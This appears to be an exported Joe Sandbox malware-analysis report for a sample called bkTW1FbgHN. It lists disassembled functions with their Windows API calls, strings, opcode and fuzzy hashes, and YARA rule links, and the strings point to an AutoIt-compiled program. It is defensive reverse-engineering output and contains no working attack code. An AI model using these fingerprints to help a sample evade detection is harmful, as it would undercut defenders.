String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: a3edd07774ab9592a1d4da7556d2a19393edcf95c9c3ba5d18bf49d3e5b9474a
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: AC019278A01209EFCB48DF98C6909AEF7B5FB48310F2086D9D819A7301E731AE41DB80

Function 01BD99D0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 01007806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0100785B
DeleteObject.GDI32(00000000), ref: 0100786D
DestroyWindow.USER32 ref: 0100787B
GetDesktopWindow.USER32 ref: 01007895
GetWindowRect.USER32(00000000), ref: 0100789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010079DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010079ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007A35
GetClientRect.USER32(00000000,?), ref: 01007A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01007A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007ABB
GlobalLock.KERNEL32(00000000), ref: 01007AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007AD3
GlobalUnlock.KERNEL32(00000000), ref: 01007ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007AE3
GlobalFree.KERNEL32(00000000), ref: 01007AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01022CAC,00000000), ref: 01007B16
GlobalFree.KERNEL32(00000000), ref: 01007B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01007B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01007B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01007D7A

Strings

DISPLAY, xrefs: 01007BDD
static, xrefs: 01007A75, 01007BCC
, xrefs: 01007D00
AutoIt v3, xrefs: 01007A2D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 0e82ec6037f0b9fb39d0134fd8485d3df47cced9ed7f8669c3aa0d0e027480c0
Instruction ID: 8ecc286d2b67f97b35c98d0b466042bc91571d0550ccc7a4b819b3a8e0a46fc6
Opcode Fuzzy Hash: 0e82ec6037f0b9fb39d0134fd8485d3df47cced9ed7f8669c3aa0d0e027480c0
Instruction Fuzzy Hash: 2F028171900105EFEB15DFA8DC89EAE7BB9FF49310F048158F985AB291CB79AD01CB60

Function 0101356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0101F910), ref: 01013627
IsWindowVisible.USER32(?), ref: 0101364B

Strings

FINDSTRING, xrefs: 01013776
TABLEFT, xrefs: 01013687
UNCHECK, xrefs: 01013883
GETCURRENTSELECTION, xrefs: 010137E3
SELECTSTRING, xrefs: 01013806
ADDSTRING, xrefs: 01013716
DELSTRING, xrefs: 01013749
HIDEDROPDOWN, xrefs: 01013700
SETCURRENTSELECTION, xrefs: 010137B6
GETSELECTED, xrefs: 010138A3
CURRENTTAB, xrefs: 010136BD
SENDCOMMANDID, xrefs: 010139DA
GETLINECOUNT, xrefs: 010138C6
CHECK, xrefs: 0101386D
GETCURRENTCOL, xrefs: 01013928
EDITPASTE, xrefs: 0101395F
ISVISIBLE, xrefs: 01013637
ISCHECKED, xrefs: 01013839
GETLINE, xrefs: 0101399B
TABRIGHT, xrefs: 0101369D
SHOWDROPDOWN, xrefs: 010136E0
GETCURRENTLINE, xrefs: 010138ED
ISENABLED, xrefs: 0101366B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 9dcf076c99b851697aadfd75a96401dd2733db31a9bed6cec5a8c528010ee984
Instruction ID: 0c126c61f394969ddf33040d4000a091dc0026c5ff7252707033ed3915ec793d
Opcode Fuzzy Hash: 9dcf076c99b851697aadfd75a96401dd2733db31a9bed6cec5a8c528010ee984
Instruction Fuzzy Hash: 5AD190702083019BDA04FF14C852A6E7BE5BF983A4F54486CF8C65F2A6DB2DD90ADB41

Function 0101A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0101A630
GetSysColorBrush.USER32(0000000F), ref: 0101A661
GetSysColor.USER32(0000000F), ref: 0101A66D
SetBkColor.GDI32(?,000000FF), ref: 0101A687
SelectObject.GDI32(?,00000000), ref: 0101A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0101A6C1
GetSysColor.USER32(00000010), ref: 0101A6C9
CreateSolidBrush.GDI32(00000000), ref: 0101A6D0
FrameRect.USER32(?,?,00000000), ref: 0101A6DF
DeleteObject.GDI32(00000000), ref: 0101A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0101A731
FillRect.USER32(?,?,00000000), ref: 0101A763
GetWindowLongW.USER32(?,000000F0), ref: 0101A78E

Part of subcall function 0101A8CA: GetSysColor.USER32(00000012), ref: 0101A903
Part of subcall function 0101A8CA: SetTextColor.GDI32(?,?), ref: 0101A907
Part of subcall function 0101A8CA: GetSysColorBrush.USER32(0000000F), ref: 0101A91D
Part of subcall function 0101A8CA: GetSysColor.USER32(0000000F), ref: 0101A928
Part of subcall function 0101A8CA: GetSysColor.USER32(00000011), ref: 0101A945
Part of subcall function 0101A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101A953
Part of subcall function 0101A8CA: SelectObject.GDI32(?,00000000), ref: 0101A964
Part of subcall function 0101A8CA: SetBkColor.GDI32(?,00000000), ref: 0101A96D
Part of subcall function 0101A8CA: SelectObject.GDI32(?,?), ref: 0101A97A
Part of subcall function 0101A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0101A999
Part of subcall function 0101A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101A9B0
Part of subcall function 0101A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0101A9C5
Part of subcall function 0101A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101A9ED

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 2f4e9ab243d59246aad7bac87bc6393d926e1366432862f6020de18c369b8ce3
Instruction ID: cdc5d679ed548cbdcf212027fdafcf728c526614a504c9eee9fff396aabfac3b
Opcode Fuzzy Hash: 2f4e9ab243d59246aad7bac87bc6393d926e1366432862f6020de18c369b8ce3
Instruction Fuzzy Hash: EE918C72109302EFD7219F64DC08A5B7BE9FF89321F100B19FAA696194D73ED948CB51

Function 00F92C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00F92CA2
DeleteObject.GDI32(00000000), ref: 00F92CE8
DeleteObject.GDI32(00000000), ref: 00F92CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00F92CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00F92D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00FCC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FCC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FCC89D

Part of subcall function 00F91B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92036,?,00000000,?,?,?,?,00F916CB,00000000,?), ref: 00F91B9A

SendMessageW.USER32(?,00001053), ref: 00FCC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FCC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FCC912

Strings

0, xrefs: 00FCC731

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 70143a2ca209f9a7752c94ccc8cf9f150aac3cb851d640116e8933e02df6dd85
Instruction ID: f0d915990dd624f66472ea70cd9a97a98adc2d1e01e808ffacd674f6e4cede2a
Opcode Fuzzy Hash: 70143a2ca209f9a7752c94ccc8cf9f150aac3cb851d640116e8933e02df6dd85
Instruction Fuzzy Hash: FE129C30A00202EFDB65CF24CA85FA9BBA5FF04320F58456DE599DB252C735E846EB91

Function 010074AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 010074DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0100759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010075DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010075ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01007633
GetClientRect.USER32(00000000,?), ref: 0100763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01007683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01007692
GetStockObject.GDI32(00000011), ref: 010076A2
SelectObject.GDI32(00000000,00000000), ref: 010076A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010076B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010076BF
DeleteDC.GDI32(00000000), ref: 010076C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010076F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0100770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01007746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0100775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0100776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0100779B
GetStockObject.GDI32(00000011), ref: 010077A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010077B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010077BB

Strings

DISPLAY, xrefs: 01007688
msctls_progress32, xrefs: 0100773C
static, xrefs: 0100767D, 01007795
AutoIt v3, xrefs: 0100762B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c63c2c390f149a5b9d5cb09db77e92f9d5b0b497bd8c4833b1dc3c55fdcdcaf9
Instruction ID: 9bb52c7b30192ab9951c55b4a4d1dbd051e5dfa22d4051a880c2259a2bbf3dff
Opcode Fuzzy Hash: c63c2c390f149a5b9d5cb09db77e92f9d5b0b497bd8c4833b1dc3c55fdcdcaf9
Instruction Fuzzy Hash: 57A16071A40205BFEB24DBA8DC4AFAF7BB9EB05750F004118FA55A72D0D7B9AD04CB64

Function 00FFAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFAD1E
GetDriveTypeW.KERNEL32(?,0101FAC0,?,\\.\,0101F910), ref: 00FFADFB
SetErrorMode.KERNEL32(00000000,0101FAC0,?,\\.\,0101F910), ref: 00FFAF59

Strings

Unknown, xrefs: 00FFAE1B, 00FFAEBF
Virtual, xrefs: 00FFAF21
USB, xrefs: 00FFAEF0
Fixed, xrefs: 00FFAE43
RAID, xrefs: 00FFAEF7
SSD, xrefs: 00FFAE86
FileBackedVirtual, xrefs: 00FFAF28
CDROM, xrefs: 00FFAE2F
ATA, xrefs: 00FFAED4
Fibre, xrefs: 00FFAEE9
1394, xrefs: 00FFAEDB
SAS, xrefs: 00FFAF05
SCSI, xrefs: 00FFAEC6
Network, xrefs: 00FFAE39
SSA, xrefs: 00FFAEE2
\\.\, xrefs: 00FFAD70
RAMDisk, xrefs: 00FFAE25
PhysicalDrive, xrefs: 00FFADA7
Removable, xrefs: 00FFAE4D
iSCSI, xrefs: 00FFAEFE
MMC, xrefs: 00FFAF1A
SATA, xrefs: 00FFAF0C
ATAPI, xrefs: 00FFAECD

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 0ede5394a8c093f95e116ca08d02bf72105fee0c174ac99c7a408c23f9633c19
Instruction ID: 796d674ed6302ce3cc6c01dad293492c00f61e1d0806ab65be84d60955599017
Opcode Fuzzy Hash: 0ede5394a8c093f95e116ca08d02bf72105fee0c174ac99c7a408c23f9633c19
Instruction Fuzzy Hash: 2F51D7F1A4820D9B9B00EB51CDC2DBD73A0EF08710720846AE64BAF2B5D6B59D01FB53

Function 00F968DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F96931
__wcsnicmp.LIBCMT ref: 00F96949
__wcsnicmp.LIBCMT ref: 00F96961
__wcsnicmp.LIBCMT ref: 00F96979
__wcsnicmp.LIBCMT ref: 00F96991
__wcsnicmp.LIBCMT ref: 00F969A9
__wcsnicmp.LIBCMT ref: 00F969C1
__wcsnicmp.LIBCMT ref: 00F969D5
__wcsnicmp.LIBCMT ref: 00F96A16
__wcsnicmp.LIBCMT ref: 00F96A2A
__wcsnicmp.LIBCMT ref: 00F96A3E
__wcsnicmp.LIBCMT ref: 00F96A52

Strings

Bad directive syntax error, xrefs: 00FCE31A
#include, xrefs: 00F969A3
#ce, xrefs: 00F96A4C
#cs, xrefs: 00F969CF, 00F96A24
#OnAutoItStartRegister, xrefs: 00F96973
#comments-start, xrefs: 00F969BB, 00F96A10
#include-once, xrefs: 00F9698B
Cannot parse #include, xrefs: 00FCE3F0
Unterminated group of comments, xrefs: 00FCE403
#comments-end, xrefs: 00F96A38
#pragma compile, xrefs: 00F9692B
#notrayicon, xrefs: 00F96943
#requireadmin, xrefs: 00F9695B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 04fe5d6d5821e4b7443eb2be208225b58db87aac7f8160a2303d63afe6d987ff
Instruction ID: 13331e8f5197817b54a59951bc0d5555ef92b54ed12c7c8060aec1ccd588d22d
Opcode Fuzzy Hash: 04fe5d6d5821e4b7443eb2be208225b58db87aac7f8160a2303d63afe6d987ff
Instruction Fuzzy Hash: 178128B1A402066AEF21AB61DD83FBF3768AF05710F044029F845AB196EF78DE45FA51

Function 01019A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01019AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01019B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 01019BA7

Strings

0, xrefs: 01019BE4

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 02f8d103dad7b29964f91cc6a248dbf8437859a9801f2ddea1ba3d3b152a298b
Instruction ID: 02eed2c62772a8fa947227d895d97c25e83a841148a8289dff59aa2578d4b6ef
Opcode Fuzzy Hash: 02f8d103dad7b29964f91cc6a248dbf8437859a9801f2ddea1ba3d3b152a298b
Instruction Fuzzy Hash: DE02CE30104301AFEB658F28C868BAABFE5FF49318F04495CFAD5962A9C77DD944CB52

Function 0101A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0101A903
SetTextColor.GDI32(?,?), ref: 0101A907
GetSysColorBrush.USER32(0000000F), ref: 0101A91D
GetSysColor.USER32(0000000F), ref: 0101A928
CreateSolidBrush.GDI32(?), ref: 0101A92D
GetSysColor.USER32(00000011), ref: 0101A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0101A953
SelectObject.GDI32(?,00000000), ref: 0101A964
SetBkColor.GDI32(?,00000000), ref: 0101A96D
SelectObject.GDI32(?,?), ref: 0101A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0101A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0101A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0101A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0101A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0101AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0101AA32
DrawFocusRect.USER32(?,?), ref: 0101AA3D
GetSysColor.USER32(00000011), ref: 0101AA4B
SetTextColor.GDI32(?,00000000), ref: 0101AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0101AA67
SelectObject.GDI32(?,0101A5FA), ref: 0101AA7E
DeleteObject.GDI32(?), ref: 0101AA89
SelectObject.GDI32(?,?), ref: 0101AA8F
DeleteObject.GDI32(?), ref: 0101AA94
SetTextColor.GDI32(?,?), ref: 0101AA9A
SetBkColor.GDI32(?,?), ref: 0101AAA4

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 242f02ac63b7314293151d22092bdc45fddb5773a35d6a20226a1450d71317ab
Instruction ID: f01eab5c368de87271fa0fcd9cbf6a18038ea50c12d5e79d3015b707cd4d90bb
Opcode Fuzzy Hash: 242f02ac63b7314293151d22092bdc45fddb5773a35d6a20226a1450d71317ab
Instruction Fuzzy Hash: 67518C71901209FFDB219FA8DC48EAE7BB9FF08320F114215FA55AB295D77A9940CF90

Function 010189D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01018AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01018AD2
CharNextW.USER32(0000014E), ref: 01018B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01018B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01018B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01018B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01018B86
SetWindowTextW.USER32(?,0000014E), ref: 01018BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01018BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 01018C1F
_memset.LIBCMT ref: 01018C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01018C8D
_memset.LIBCMT ref: 01018CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 01018D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 01018D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 01018E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 01018E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01018E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01018EB4
DrawMenuBar.USER32(?), ref: 01018EC3
SetWindowTextW.USER32(?,0000014E), ref: 01018EEB

Strings

0, xrefs: 01018E55

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

